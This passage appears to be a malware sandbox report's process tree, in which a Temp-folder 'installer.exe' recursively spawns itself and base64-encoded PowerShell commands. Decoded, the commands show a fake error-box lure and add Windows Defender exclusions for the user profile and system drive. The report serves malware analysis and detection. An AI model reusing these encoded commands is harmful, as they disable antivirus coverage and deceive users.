        PID:3972
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        22⤵
        
        PID:4052
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        23⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2452
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        23⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2412
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        23⤵
        
        PID:3392
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        24⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3672
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        24⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3684
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        24⤵
        
        PID:3852
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        25⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1472
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        25⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3836
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        25⤵
        
        PID:2732
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        26⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3512
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        26⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1112
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        26⤵
        
        PID:2676
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        27⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1276
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        27⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3772
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        27⤵
        System Location Discovery: System Language Discovery
        
        PID:3084
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        28⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3820
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        28⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1832
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        28⤵
        
        PID:3452
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        29⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3848
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        29⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3792
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        29⤵
        
        PID:3428
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        30⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4112
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        30⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4140
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        30⤵
        
        PID:4232
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        31⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4264
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        31⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4284
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        31⤵
        
        PID:4344
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        32⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4440
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        32⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4492
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        32⤵
        
        PID:4600
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        33⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4624
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        33⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4656
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        33⤵
        
        PID:4708
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        34⤵
        System Location Discovery: System Language Discovery
        
        PID:4772
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        34⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4796
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        34⤵
        
        PID:4848
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        35⤵
        
        PID:4964
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        35⤵
        
        PID:5052
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        35⤵
        
        PID:5096
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdwB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBqACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgB1AG4AIAB1AHAAZABhAHQAZQAgAGYAaQBsAGUAIAB0AGgAZQBuACAAaQBuAHMAdABhAGwAbABlAHIAIABhAGYAdABlAHIAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHcAdwB1ACMAPgA="
        36⤵
        
        PID:448
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAbQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAaQBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAaAB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAYQB0ACMAPgA="
        36⤵
        
        PID:1488
        
        C:\Users\Admin\AppData\Local\Temp\installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
        36⤵
        System Location Discovery: System Language Discovery
        
        PID:4128
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
